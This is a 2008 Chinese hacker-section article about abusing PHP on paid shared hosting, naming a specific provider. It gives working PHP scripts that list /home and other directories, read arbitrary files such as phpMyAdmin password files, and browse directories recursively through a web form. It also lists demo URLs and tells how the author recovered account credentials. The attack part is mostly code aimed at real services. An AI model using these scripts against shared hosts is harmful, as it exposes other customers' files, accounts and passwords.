| 下载中心 | 文章中心 | 虚拟主机 | 网站开发 | 加入收藏 | 设为首页  
     热门搜索: 域名注册 网站建设 股票投资 招商引资 网络游戏 健身器材 美容美发 网络营销 电脑学校
   本站首页 | 公司资讯 | 业内资讯 | 服务器类 | 黑客相关 | 私服技术 | 家用电脑 | 网站建设 | 局域网类 | 网吧相关 | 游戏攻略 | 编程开发 | 软件应用 | 硬件维修 | 分类
 站内搜索:
  百度热门搜索: it教育 网络教育 网站推广 创业致富 电动车 太阳能 瘦身产品 公告: 联邦电脑十周年系列操作系统,快速稳定,欢迎下载使用!
  栏目导航
  相关文章
一点经验
作者:佚名  来源:不详  发布时间:2008-6-19 7:50:04  发布人:snlb

减小字体 增大字体

type="14227"> 大多数(能执行PHP的)收费空间都有此问题
以下以虎翼为例:
代码:
<?
$d=dir("/home");
echo "Handle:".$d->handle."<br>\n";
echo "Path:".$d->path."<br>\n";
while($entry=$d->read())
{
echo $entry."<br>\n";
}
$d->close();
?>

利用此test.php程序可以查看/home下所有文件,可以查看51.net的当前主机的全部用户
把"/home"改成"/"可以看到什么?你自己去看吧.别太紧张.紧张的在后面
HOME下的全是登陆帐号
HOME/.domain和
HOME/.trialdomain
下的全是三级域名
帐号里有很多都没空间,是空号。我反复试了。
三级域名是对应·A型虚拟主机
例子(没敢用虎翼的)
http://tonylong.l1h.net/test.php
http://tonylong.l1h.net/test1.php
http://tonylong.l1h.net/test2.php
http://tonylong.l1h.net/test3.php

用aa.php读取文件原码
读取。。
<?
$fd=fopen("/home/*.*","r");
while($buffer=fgets($fd,4096))
{
echo $buffer;
}
fclose($fd);
?>
例子读取:/home/html/phpmyadmin/user_password.php的原码(这对网站威胁很大)http://tonylong.l1h.net/aa.php
用ss.php查询指定文件目录下的所有文件和文件夹
<?
function listdir($dir){
echo "<ul>";
$handle=opendir($dir);
echo "directory Handle:$handle<br>\n";
while ($sdir=readdir($handle)){
if(is_file("$dir/$sdir"))
echo "<li>$dir/$sdir";
if(is_dir("$dir/$sdir") and $sdir<>'.' and $sdir<>'..'){
echo "<li>$dir";
listdir("$dir/$sdir");
}
}
closedir($handle);
echo "</ul>";
}

if(!empty($dir)){
listdir($dir);
}
?>

<form action="test.php" method=post>
请输入查询路径:<input type=text name=dir size=50>
<input type=submit value="查询">
</form>
例子http://tonylong.l1h.net/ss.php

以上演示空间是l1h.net的免费空间
大家别攻击

还有perlhack 编的一整套.
反正我自己找到了我的虎翼帐号及密码
[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:注入下载文件的代码到IE进程然后执行下载的文件
下一篇文章:我找到bbsxp5 sp1漏洞的过程总结
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站地图
  联邦电脑版权所有 Copyright©1996-2004 联邦电脑 All Rights Reserved  
   xkej@sina.com 业务联系:0516-88380202 88085202 QQ: 81566563  
  苏ICP备05045772号 当前在线人数: